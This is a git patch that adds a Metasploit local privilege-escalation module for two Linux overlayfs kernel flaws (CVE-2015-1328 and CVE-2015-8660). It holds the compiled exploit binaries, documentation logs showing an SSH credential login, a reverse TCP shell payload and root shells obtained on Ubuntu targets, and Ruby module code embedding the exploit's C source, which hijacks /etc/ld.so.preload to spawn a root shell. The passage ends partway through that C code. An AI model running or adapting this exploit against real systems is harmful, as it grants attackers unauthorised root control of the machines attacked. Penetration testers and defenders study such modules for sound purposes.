From 27cf5c65c4f15a46d408c230214b8e50228dac2f Mon Sep 17 00:00:00 2001 From: h00die Date: Tue, 4 Oct 2016 23:21:53 -0400 Subject: [PATCH] working module --- data/exploits/CVE-2015-1328/1328 | Bin 0 -> 13655 bytes data/exploits/CVE-2015-8660/8660 | Bin 0 -> 13564 bytes .../exploit/linux/local/overlayfs_priv_esc.md | 180 +++++++ .../linux/local/overlayfs_priv_esc.rb | 458 ++++++++++++++++++ 4 files changed, 638 insertions(+) create mode 100644 data/exploits/CVE-2015-1328/1328 create mode 100644 data/exploits/CVE-2015-8660/8660 create mode 100644 documentation/modules/exploit/linux/local/overlayfs_priv_esc.md create mode 100644 modules/exploits/linux/local/overlayfs_priv_esc.rb diff --git a/data/exploits/CVE-2015-1328/1328 b/data/exploits/CVE-2015-1328/1328 new file mode 100644 index 0000000000000000000000000000000000000000..872f097cf2fcf7fc58fc9cd2921a07b2edaf2d81 GIT binary patch literal 13655 zcmeHOdvH|Oc|Y1kSje!5hp~)nxRwoFVYCt;6Zt{1D-f)xco>A!CYG;OyH{vowY#}{ z7fJSD(+HSsDYn~sQkvJ${E?E@of6l{D71rwX~FJvT)9&>X_IuAG-h`FXjNNwRfl-{ z`_5x^@71oGKiYpf9N7Dv@Ao~T zS&6l=1uV!`u{+s(Al3K&Yx4-8%@gDqMSn%WOi@)sqEy~& z3d*dY+g1oxQN}b5kR8>vZWU)idwE9D30aRRPn}SZb_A21U)uSlouZTE7)eppK585N zx~1Q4PY@jOK_YA$zs^$9rL^}=D@OV0<(vf#@{FPn3z#XY>>hy~)$^B4s+Id>d6nWa zCEKT{WLa|}-nY56IT340#FN?Krs1~DO`BT-nN(mSZ#VfT-5t9R@G7Y|)`O!uQ}bvH zko>;;U;g%Y@BP#J9;|L_|CjYoKeBn#zmAbUbtU=W?Ggp^XcGRwd#BXU05>;jfR@gM z*@G4EBNg!V74SzZ;6oMg)(ZHJ3i#m)_|XdZv%od{+-WUEjAab6Y$jnCY1Thv#w~-HMlv#J zaA)awj71ZvjKNZABgwLZsch0>x=y9*87pF1`d}oU1afdNm6V9ic64>NZ`C&jT1&Z& zf%{Qu5C7+tRB#Fv-0W2}vTG6pFVE3EMt!N0 ziXY9j)Hf>C%edYGK-`i-qSL+jAGG22c`j_jsZJ{G zwc({P0O7COa0H^1dTn@Z31w`+hTG$lw&4qH`olIHfiIOU3(Ngi3MEOSmpx9Yl`!0n#X3D_bpXdDV z5>G>-uvaDE^0)Wrpj^E-*Bt}WDYzMXjL(gNfBgTzx;7N$N1ux2Ci)P;p>oL@&g zbzNbS^9{sPmlY;BzmjZK_kk*m>#L6*NA| zY2n<_{P-~1nZFAmxLCyK8GnY@Z~Q{BUnln268jxukCoUf#C`!RhVWarX(;Q`1sVbu zX&jFKfTa83IW(3>_WO*zJ8?m)3$lx3H@*(J{Bam#+{Z#=ZD55832Z76q2fmwCuJEe zr83TvlYfWCINDXrzkyu%YRAm$7pGe^;z;D-(;61S8yxJ>C^;E~q#g74nb64{@ z0OJdnK)rYaIj;0wHw25&SUs|3+jb7dXxqb~v2aPn)wUBtrB>AbcKEZ^ z`V|NT`y7?_eXycdtC4&4vh2l{+|eJ0bJ@wO9r-0#fKc1s<)SC(W)MB`XJr2>tn$;i znU<6o~0GU4qIyyZHkM~_ak5$e0YSte?=rsQ&pTyBCl(fT`(3!mQgvr`?@ z;!eoDmb)r^y#`-GH02ikIYeBkkfh;z?f2%fJjI9FC2KN8)~BjFWd)X%DzIWHD)1tt zB1-GPit>`cavd|HM`wyzs=H5`()1&Aw~*-&)I{BTL=o4QiZ;^jO6ct(y*)zuij>xu zq;ZmNfb;^5)r%nr#=lsqMgAkI#f?)PH!ggW#AhJEI1K>?hTITxYAh(M2#>iqGay;Z0e*$*=IxZqa zryzLsGA6_0@W5E;v!Pru^k`@9!_a}w+#8|puG4F37HgRDPB#(V-_`i$h98A5{lZHt zUcMSdg-^U|ty1<~xwpD;_@GdM=w`}A9y?a7A=II?+HB?>Ipp_(l7V-2bBK% zml@_ftetYHr2QEsb5LtC`?Y3kFx{NY=$UjPg{|l(vdu%ZQFW>`XVYoJbb~3z_nq23 z8%kT5L~6(|v7O!0oHkR@X6$2|4;yCENUY}`xWrKx={a@8FcXoH{tS~jUVCh(Oa5kE zHD`=y7CYjR=14jnF$YuTCp%wH4JuPIZ>KCLnbNlJ*AMLP*tdJXzH85c-Q61Y>sqN= zS}Lho1M!R|T2spck!aM&WZWSkpCW*Wb|R9oblR#XV)RImHjP9o5@XFOY#VEB?JE-% zTeA!+%4<3skN;8s6PxYo-V~m&?N!XABSXn}@*vu58j)D0)W7|ac*2NjR!WOPU>RD{ z7}ByC!_?^61ZGi#>z36Mqs68e9f&93Oq8L;@BmcHn$c8OZH!?)Y&GGuoQkYXtd{X= zQO)_YRZPPZkr^>ZU_=2+^=I%Rp)VkUiHP14Pev2jn4vwKO~&!?6&Uz*ZEZFl(=Gox z9W6}g2Mr5+qvk)70(q!5if1-09kB*JzhPrr&qGqXR;UT3+9zx6w%QiWFI_eYg+?uw z$czm7Ij5~_)S5P|*BXS229!ZD$NP@M{sws)8HxU8JW4jK*ZjPEn5?Bbtk+Np7{vSi zur^SNzfs$=MQhR4uGQ|&SY~uE?H7s-&3*A?b0*u+*r+{On@vjpbE1v%OG10dGAXKA z#;{ByL*=xr*XVxe{Xwz#0%+<# zi^abMy@3Vb9nb`pkyb2j%aNy4^~63_HC$J9=fYcRo~yd0j&OP*)eArCNI|CZ`i#+r zh4d%iD;9gm7xLAe^lV);-+QSF zMRR!!@K--XJ7{Ss$)EO+oNSNdSA%vKpsd|j_pGPGSO1K+!>65|*WvU3c6Hd-a&msy z*EV{~E?+R=YYX{WLOy@HPiyzpL%-cu!`n^qXn`NGf|0YE>1G6OM&M=yZbsl{1a3y) z|3d`QcrQX}ucVy8g|;4)6kRA-=C29z+#<=x@WzbN9sEk)TYGtq-ZW667qOI93c~88 zoc1}Cl>CE_iz(vIc!ESq-+c4)1h2jUOn3yZ_JuDok<`0-dWS*D{w|w%FI^~Uy_~2$ zjrvZl_HF8$!tGoO`=9wio>MrJysCGL)KlLURQY(j$lEhnE$s1bgYzn$QS_3VuflZA9XDon6JuA`& zYMFu#s9Zd08D^RVk}1mwgxWistjIyh9ZY5eeOWvoH{k_BfVhE3W`G6ozlo=KeIN!~#R&^N zVw#Z=VWIMeqEM3$QYbnFhqwfIDZ*nPUXTQ$slh=5Unl=p65Zc4meqaK<_UtEJ>Q}3 zZw}(3#=YY2L5A)rW#8=yf}1@*p>b~ZGH*7^a~p8A+gqL>$1UmbUe3*4-1gfb!Xs2l zm9OTVGcJ4eO;X+O%HwWiZpBa8Pk4gh7@LrQUs9U4sO`#L%@2- z_T-M=;}FuEqU_Z?@-M^jStdF1W(>ipDsxe&al8qTd|?Ig>-;<8ukXpCOvBdPU7a3a5C*K?U%Iw33O@fDSNf9 zs&ixNe3%-as(dwmuEW+|zB-pNvl;>FSE+x^Gf?^yE89#*Ar#+=i|d#(5}k!UaYigeX$F@h>BV_ zoH(L0KWK+|-pguB`)Rw-ico9a&7)3yF;nxS6R#_sw{+r5 zn3~U=_|nqzjT2v1daiNe%Q2ty+996z;^{=q7j~f+C$H2z;KcDXBJVFJUeDBh>%?cz z!#Q#HswnQKdF(&vc620KbF1(c*j;~m&hxNE?An5$L!b5=gxA$N@sPy#y712eufkJf zUbai!AN?Gk8_(0yPuk_@54ir^ei;K^u3eY8K3Z{iFLIQ`jQn@VQT^$h044tJ9hB-- z&d)z{*%B695kzh_<&iBHH_|BQhvs2A38~gE&f-#yf~(4m6CV%M-1gqh_2-V0PXS+w zcJ<2rftvGn0M}GuHX7yl+;K&R7?#@fRQ5M3;LlgU&sD(xq5}RJ@H$q{=$Mi{y}|Y8 z-tRxE;OE~e;8h4nxpv)F0jGU^IsF~Lsh;lpk|%Gk5O>*(zZ4!PLV^HN{!OO@=aQr{iVKa%=%o{SRzwgmbD$2sJ< zj90+_p#pv#xaRO6n2##x`@H4jtX05Ufm1x)?Fs@fSMKL3_!+E#Kh5#E>(q$~`oCWR z{}bS4&nrhwD`RDGk|c`5!aKL_)4MwNck4RCF=XQ)zK9#9ZVl=cFAEaY}%@2HP6Fiqu(&_Dkc$c8#{eU^b#M_5hc5rY6 zCN@r|mlh7y!>v0Lj|`c^s5U=DKu4UThh?5VKEuKGeW6_)ddKc3&sJ*L$-0_pv(M*=Ng6W;zyY$(Rb?@3r z0qc(RB@9NdLc|Gdar!$LRL8LC@HLOD6B4JnU6?p4J`1)oekgnvAZNP4-@Ax9@zWMg zIX`Lcgv3d6C&o{fJE1v8%iUsID_w`q(fOH_J`hR95DdL@4`LCECv_YeLF8xSNRdYa zk^p7ob-X@OfuqCh{M5X&Tsl~f12#^Oj>J0=ediHHq)$ literal 0 HcmV?d00001 diff --git a/data/exploits/CVE-2015-8660/8660 b/data/exploits/CVE-2015-8660/8660 new file mode 100644 index 0000000000000000000000000000000000000000..532d81071c034536e49217a5241e87f297252c57 GIT binary patch literal 13564 zcmeHOeQaD;mA{^`6DLi^PDz6MvB@Je#3}LENlkDQvb=HZWE?qZH+5QIn?8?cp5r0& z#mt-9E^0TBy2=pJR@$nYT|||o(h?yM)(VgbB6e!j&=p%;1XZ@XXstq7PidsIgvgYo zv%hoSJ>&PDX9RyNf8p!QJ@@?XIp==g``&#gf7ji+&sS3;IQYb03*u($bqU$A5Z68+ zS%r0o6+#yq#BE|3kUIQynM2f0F`ZYYnbs>gKWHs}9X=cA@aZza^mZE-Ou2?csl0`t ztE5e98*P@U5Sj!?kLudEL9(FzGQsq`s>h5^8BlrzlU}pZYgT$pXUH%DQ*Ix%jedQ~ zZl6yFN4!o%bjf&uk}QRL->_noekLGUP+caNR@3_%=utiY)WEGgtjep_FV|H2m?~DZ zCgKA-+glT{mP9<2A88rs*x9nPJ(x=ecgS{=eUjaO=!mQm_hS<{YTsJ?Xbw>R(e+=c zn|b@Ko!9%nHS**;pZvn_uKnzLB>z7A$cAi}U9jv;!tZ|PG*1n1i-QK}=EbnsRRxb# z!M9bx%_?|%6?}gc{CE|747i4$H#`cUQoBA>1%I##ep3~kMyry28qZ4j`YQNsRq#Vq za2@y>af_JJ`jHZX*O9h!Rq*JEISur!46}i!zWhO;FmoUwY7#z;VEmK;_#G#i==Tnw23@XdWS&^(|BqQ+@ zkP&c{b1a!osT@P>@9pW_YwQTNms2}}A3>dc^3Sg*O;sCl$J9ES*FHJ7c^$5e$5+#e zcm{cd6zofJlkWmiYU$iIEy5P{H`f)h`d+FFYngf@MNhvfta6cOX zZFAtXZaH)~aOZxkJ8I@bZ`=^Air-+1`E!zLJfA4mog|+Z-|ud=-PB zBMuxLUk)c6xY~kc-YEy(P?i?rX$Q_@N!e!|_!@`&IS1}sPvMhq)rU{lnN6Aqk4;&1 zbI(I5eDVkN(+*`MOCLE5k<#Wq#0?vDq=+9Pq2g=_VeH+lJ6v*hPpT<`CY{O zi658z4&rHOi{~VNC-F3-#iu2|iFg{y;t9#$N<0l=F(dh#iKn3}_Dg;x@ib(`dnNB9 zo`$NZOa9&WgQp=Xwn_dS;%R7#n&jUko`$5@DEZfkr=chc$-hQC4MFkRdjK~7gm~)u z;;iKVjd<$v;tcrhS9=PtJQOax9zOZYYxnl`T%H*^%U_!JLq1%1A$;l0 zkB4h!!mrHdp?rY^!(%_Ot{)8-UbOXJSNbRRgiv3RUvmVSbC01SM_;T90;>7VG>vcg zhK-__10@@nNR8pbqw|wsOj2s@1!QBUZosS^Uaz4# zmo7A*ofm29O@5Xn+RBBWCiZP8OiIiDKm}dJ9GQHMGOkd@^OSn5EYgLPZ1GFevQ?jZ zYaDh9-+vIz3>UslQ|s~=O}I7KBZVze3k zaZHu4xm>~wm7u}+B!o(H%a976Ig>&9wA8kzNa5we<+;~jvYbbCaO7P?o-DZdd6=G@ z{rg%mw-UA_7KZZArScdVrm1#=iv16Wp6))i=V}4-?9PyENob-G50>A}A-eD|qKh;T zQrvFW7}+^p_Z+4k4Qx}nA)^qUdw{BeB1$h!haLzON}>CE3O7PWdI~=a_4S_FJh4W@ zk~q^s^uFG$Z*2e1@TEWaX@{Fz_j}kKyJ~G{*!VbX3ej75v$t@g3pPq?|0{fQx+Z-0 zuk&xx#`m{JLl1_Ih8_wT(}ROSmjBK4LRzkm!aL!@dy{g%J3+>2A9ZY-bk0)9CbgFA zpw?<7Gp$3B5&RQX(yhbJoYuUHOG{&j66s+xi^q&TtpoAYwtOa|xCQ&I`EA2^LXk2K zbXcSxHnWMysE|(`+F&G}Fk`{sN>@3aN@dz&nw8d~Su%uEj=kn%m<8KF z`#{$Mqfqn6VNo;ESaaK|<@Hb3EN>*7UL59N_f8T}p|ZRXv`LWssrgc=jb>S(abKY6 zK*LSL^(Vx~Z{2<8U3Y9E6C{Ji=c3!}-vwMF5CqLM*GudEc9uCiHiYPl{`e1|@RYeovU$e6yj_RAD~ z528R9#T0I}iD**!^!`kN^MCtZN#3=b_2~qczxkf4wR!%wFy*s(dHErP_!@o`=z^I7 z-CR*vXOnX5=M=7QDe$}UxN0EZ2k^Iw_e&|fSJ&w>#rS!}bG_S?9DlRm@^LL8+cTo% zad{?r?$2wAKcMoJnLj(>@7UggUR2}ys-nMA^oF9#>UF8IUeOOJx>M18ir%m2prQ{e z`h=p-D*7*qen-(46@67vZ~gY~-MdR`J~Dt0cX_Qn*b!`R*^!sr_Q$rj2iw|%cWt$C zA%eNlq!k$ewX!xH;#53knc0j8rqY%f40ZOjSdn9jJC@1^2l8=z;l?MzAaO%<8yAd? zreM#eR@TnJjb1LEPPrHZd08_NAqADnBrFk(r||7EXqh932f-jO9gA2I5j2O4!7Og` zjG-8GnX@&FNH&W*L#e^(Pe&mJ>yczUilWmnh$tvau`Ledav~T_CzB?=Z~ngoTE{eJ zdA)S_bZ`rP9K4Pth=}Jm^B+Wl)(-3U`E+m#eiEAG7NXjPq)cr`?9{h>y2LGI@D9l> zL|*+aWZl485K{`6RSl;7iIS|(`@sFcXzyWt z-p|gdihd1w&fx98hmc8o2kY~GaX?kLSt)bT~|&M#WxU_ z{`hj8U@@-rG zr}Vl1XVrN-tMvcXGhw*@*uZ&@KKm81zfl(pD(Wr&J0ATj0bNR73D^qT{z&;#5F=6U zCVoC(|08dGz5I`$+u+dW=Z7ZcpXHVJ@>ifsRpj#NODYBJPt^Z8WNGfPKA)fLA2y@f z&-0VZ=lSz1=sL@1zmEBh$UtCun_J)+|1~n4`aJ*L-@vZ{5B8H`XBb-BujxQec0!+Wrm7= zq1lOg7F4*0m3DaTC=p3ATWxM$?E`-WwiQ2aKkwhPJ}Z?!L?pjCy730V`=c9gEc;cu@il_? zGdF&7`8~#szpwoM;>OovKk0WuGVRA(2=5opOutw!cpq@%c%Z)b)Ubk+1!GF$; zdrw7sJ=Kc0X*s$A9V0dPis-FBz0dj3|BWkjmwZs+x(5#_-1{E+0Pq^T9sW?Yi`U1X z#25GH8D;03$NoP``NiWh0lZSXrltHXVz%6$_D=U>WuII+D9CTOpj59)c3zWt*o7K( zq!z*)l9l?6Br4gVeV9Bd`TUYBqB;~@Q(>M2WJfJ-?+2v(;(78>;5TEu$lHkm?|J(P z_pKIF3g`X)5O7UOx}#4^eDQqClO4CHt%3*8ftA|Z0-WmOU5~qfYt9O)bPw<~z9up5ssH_i~3y zxUSk2qLiAXMoNlX6uZYkT(-i;XsMvEs44I|HW*C0wi cGPfet!;Q#EB>x+L8@Iju-I)FV0NmLB0UvNMhyVZp literal 0 HcmV?d00001 diff --git a/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md b/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md new file mode 100644 index 0000000000..f8fb582497 --- /dev/null +++ b/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md @@ -0,0 +1,180 @@ +## Creating A Testing Environment + +This module has been tested against: + + 1. CVE-2015-1328 + 1. Ubuntu 14.04 + 1. 3.13.0-24 (binary version of exploit compiled on) + 2. 3.19.0-20 + 3. 3.19.0-21 (not vuln, exploit failed) + 4. 3.13.0-55 (not vuln, exploit failed) + 2. CVE-2015-8660 + 1. Ubuntu 14.04 + 1. 3.19.0-41 (binary version of exploit compiled on) + +Untested against + + 1. Fedora (code included to identify vuln versions) + 2. Redhat (description includes vuln kernel versions) + +## Verification Steps + + 1. Start msfconsole + 2. Exploit a box via whatever method + 4. Do: `use exploit/linux/local/overlayfs_priv_esc` + 5. Do: `set session #` + 6. Do: `set verbose true` + 7. Do: `exploit` + +## Options + + **COMPILE** + + If we should attempt to compile on the system. Defaults to Auto, which checks if `gcc` is installed + + **WritableDir** + + A folder we can write files to. Defaults to /tmp + +## Scenarios + +### CVE-2015-8660 against Ubuntu 14.04 with kernel 3.19.0-41 + +#### Initial Access + + resource (/root/Text-1.txt)> use auxiliary/scanner/ssh/ssh_login + resource (/root/Text-1.txt)> set rhosts 192.168.2.156 + rhosts => 192.168.2.156 + resource (/root/Text-1.txt)> set username ubuntu + username => ubuntu + resource (/root/Text-1.txt)> set password ubuntu + password => ubuntu + resource (/root/Text-1.txt)> exploit + [*] SSH - Starting bruteforce + [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 3.19.0-41-generic #46~14.04.2-Ubuntu SMP Tue Dec 8 17:46:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux ' + [!] No active DB -- Credential data will not be saved! + [*] Command shell session 1 opened (192.168.2.117:39027 -> 192.168.2.156:22) at 2016-10-04 22:48:44 -0400 + [*] Scanned 1 of 1 hosts (100% complete) + [*] Auxiliary module execution completed + +#### Escalate + + resource (/root/Text-1.txt)> use exploit/linux/local/overlayfs_priv_esc + resource (/root/Text-1.txt)> set verbose true + verbose => true + resource (/root/Text-1.txt)> set payload linux/x86/shell/reverse_tcp + payload => linux/x86/shell/reverse_tcp + resource (/root/Text-1.txt)> set session 1 + session => 1 + resource (/root/Text-1.txt)> set target 1 + target => 1 + resource (/root/Text-1.txt)> set lhost 192.168.2.117 + lhost => 192.168.2.117 + resource (/root/Text-1.txt)> exploit + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if mount points exist + [+] /tmp/haxhax not created + [+] Kernel 3.19.0.pre.41.pre.generic is vulnerable to CVE-2015-8660 + [+] gcc is installed + [*] Live compiling exploit on system + [*] Checking if mount points exist + [+] /tmp/haxhax not created + [+] Kernel 3.19.0.pre.41.pre.generic is vulnerable to CVE-2015-8660 + [*] Writing to /tmp/svF1U2Ya.c (2356 bytes) + [*] Max line length is 65537 + [*] Writing 2356 bytes in 1 chunks of 8098 bytes (octal-encoded), using printf + [*] Compiling /tmp/svF1U2Ya.c + [*] Writing to /tmp/fHCJO1ex (155 bytes) + [*] Max line length is 65537 + [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf + [*] Exploiting... + [*] Sending stage (36 bytes) to 192.168.2.156 + [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:44823) at 2016-10-04 22:48:57 -0400 + [+] Deleted /tmp/svF1U2Ya.c + [+] Deleted /tmp/fHCJO1ex + + 3986817421 + viRVXKxRruOuDKwEBYAscFvJPPrtQbTO + true + zxrnfClHzgOcewXyEqQeEAcHsQmsEPtk + cqdStYFUGluqJkpgfGAkPvcVgoKTtJlY + EOzlAFTpQsoXMWIicFiKHxsVjjlFpspC + true + FgIyOJMyeREcjxpsbWkNDZNtuUGYmBtt + omnusQCOqEdrUTbMLtDmXibhFAVQuTAz + VPsVgFTxVwskShumsJkambKWMQhifDJi + whoami + root + uname -a + Linux Ubuntu14 3.19.0-41-generic #46~14.04.2-Ubuntu SMP Tue Dec 8 17:46:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux + +### CVE-2015-1328 against Ubuntu 14.04 with kernel 3.13.0-24 + +#### Initial Access + + resource (/root/Text-1.txt)> use auxiliary/scanner/ssh/ssh_login + resource (/root/Text-1.txt)> set rhosts 192.168.2.156 + rhosts => 192.168.2.156 + resource (/root/Text-1.txt)> set username ubuntu + username => ubuntu + resource (/root/Text-1.txt)> set password ubuntu + password => ubuntu + resource (/root/Text-1.txt)> exploit + [*] SSH - Starting bruteforce + [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux ' + [!] No active DB -- Credential data will not be saved! + [*] Command shell session 1 opened (192.168.2.117:42139 -> 192.168.2.156:22) at 2016-10-04 22:54:50 -0400 + [*] Scanned 1 of 1 hosts (100% complete) + [*] Auxiliary module execution completed + +#### Escalate + + resource (/root/Text-1.txt)> use exploit/linux/local/overlayfs_priv_esc + resource (/root/Text-1.txt)> set verbose true + verbose => true + resource (/root/Text-1.txt)> set payload linux/x86/shell/reverse_tcp + payload => linux/x86/shell/reverse_tcp + resource (/root/Text-1.txt)> set session 1 + session => 1 + resource (/root/Text-1.txt)> set target 0 + target => 0 + resource (/root/Text-1.txt)> set lhost 192.168.2.117 + lhost => 192.168.2.117 + resource (/root/Text-1.txt)> exploit + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if mount points exist + [+] /tmp/ns_sploit not created + [+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328 + [+] gcc is installed + [*] Live compiling exploit on system + [*] Checking if mount points exist + [+] /tmp/ns_sploit not created + [+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328 + [*] Writing to /tmp/k4JlQwrx.c (4375 bytes) + [*] Max line length is 65537 + [*] Writing 4375 bytes in 1 chunks of 15306 bytes (octal-encoded), using printf + [*] Compiling /tmp/k4JlQwrx.c + [*] Writing to /tmp/cjKriIIN (155 bytes) + [*] Max line length is 65537 + [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf + [*] Exploiting... + [*] Sending stage (36 bytes) to 192.168.2.156 + [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:57869) at 2016-10-04 22:55:04 -0400 + [+] Deleted /tmp/k4JlQwrx.c + [+] Deleted /tmp/cjKriIIN + + 3437009797 + lGTsPkjgaOAhZPAssSiPBdigTNuavPNA + true + zQgQeZUDzBZvCUelOYXjpIviozSnTjoE + ZaGCLiKvvhyTawBwPHNqidQSerdmxDYE + WjOaBQVXdxHBiVdomUBMRRrnLOPUGfGD + true + DgSZZHBIFrsBMvyRTBNSBTcRmVMZXMyx + bwHnnuHwZAvSsZoYLhNrcuRDIKuqPRWu + NfNIsINldyrgOLLagCPIQiQsZqTsmUec + sh: 0: can't access tty; job control turned off + # whoami + root + # uname -a + Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux diff --git a/modules/exploits/linux/local/overlayfs_priv_esc.rb b/modules/exploits/linux/local/overlayfs_priv_esc.rb new file mode 100644 index 0000000000..73c973009d --- /dev/null +++ b/modules/exploits/linux/local/overlayfs_priv_esc.rb @@ -0,0 +1,458 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require "msf/core" + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Overlayfs Privilege Escalation', + 'Description' => %q{ + This module attempts to exploit two different CVEs related to overlayfs. + CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 + 3.16.0-25 (14.10 default) < 3.16.0-41 + 3.19.0-18 (15.04 default) < 3.19.0-21 + CVE-2015-8660: + Ubuntu: + 3.19.0-18 < 3.19.0-43 + 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) + Fedora: + < 4.2.8 (vulnerable, un-tested) + Red Hat: + < 3.10.0-327 (rhel 6, vulnerable, un-tested) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'h00die ', # Module + 'rebel' # Discovery + ], + 'DisclosureDate' => 'Jun 16 2015', + 'Platform' => [ 'linux'], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'CVE-2015-1328', { } ], + [ 'CVE-2015-8660', { } ] + ], + 'DefaultTarget' => 1, + 'DefaultOptions' => + { + 'payload' => 'linux/x86/shell/reverse_tcp' # for compatibility due to the need on cve-2015-1328 to run /bin/su + }, + 'References' => + [ + [ 'EDB', '39166'], # CVE-2015-8660 + [ 'EDB', '37292'], # CVE-2015-1328 + [ 'CVE', '2015-1328'], + [ 'CVE', '2015-8660'] + ] + )) + register_options( + [ + OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) + ], self.class) + end + + def check + def mounts_exist?() + vprint_status('Checking if mount points exist') + if target.name == 'CVE-2015-1328' + if not directory?('/tmp/ns_sploit') + vprint_good('/tmp/ns_sploit not created') + return true + else + print_error('/tmp/ns_sploit directory exists. Please delete.') + return false + end + elsif target.name == 'CVE-2015-8660' + if not directory?('/tmp/haxhax') + vprint_good('/tmp/haxhax not created') + return true + else + print_error('/tmp/haxhax directory exists. Please delete.') + return false + end + end + end + + def kernel_vuln?() + os_id = cmd_exec('grep ^ID= /etc/os-release') + case os_id + when 'ID=ubuntu' + kernel = Gem::Version.new(cmd_exec('/bin/uname -r')) + case kernel.release.to_s + when '3.13.0' + if kernel.between?(Gem::Version.new('3.13.0-24-generic'),Gem::Version.new('3.13.0-54-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable") + return false + end + when '3.16.0' + if kernel.between?(Gem::Version.new('3.16.0-25-generic'),Gem::Version.new('3.16.0-40-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable") + return false + end + when '3.19.0' + if kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-20-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328") + return true + elsif kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-42-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable") + return false + end + when '4.2.0' + if kernel.between?(Gem::Version.new('4.2.0-18-generic'),Gem::Version.new('4.2.0-22-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable") + return false + end + else + print_error("Non-vuln kernel #{kernel}") + return false + end + when 'ID=fedora' + kernel = Gem::Version.new(cmd_exec('/usr/bin/uname -r').sub(/\.fc.*/, '')) # we need to remove the trailer after .fc + # irb(main):008:0> '4.0.4-301.fc22.x86_64'.sub(/\.fc.*/, '') + # => "4.0.4-301" + if kernel.release < Gem::Version.new('4.2.8') + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660. Exploitation UNTESTED") + return true + else + print_error("Non-vuln kernel #{kernel}") + return false + end + else + print_error("Unknown OS: #{os_id}") + return false + end + end + + if mounts_exist?() && kernel_vuln?() + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + def exploit + + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') + end + + + # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size + # Exploit Title: ofs.c - overlayfs local root in ubuntu + # Date: 2015-06-15 + # Exploit Author: rebel + # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) + # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 + # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) + + cve_2015_1328 = %q{ + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + #define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" + + static char child_stack[1024*1024]; + + static int + child_exec(void *stuff) + { + char *file; + system("rm -rf /tmp/ns_sploit"); + mkdir("/tmp/ns_sploit", 0777); + mkdir("/tmp/ns_sploit/work", 0777); + mkdir("/tmp/ns_sploit/upper",0777); + mkdir("/tmp/ns_sploit/o",0777); + + fprintf(stderr,"mount #1\n"); + if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { + // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower + if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, 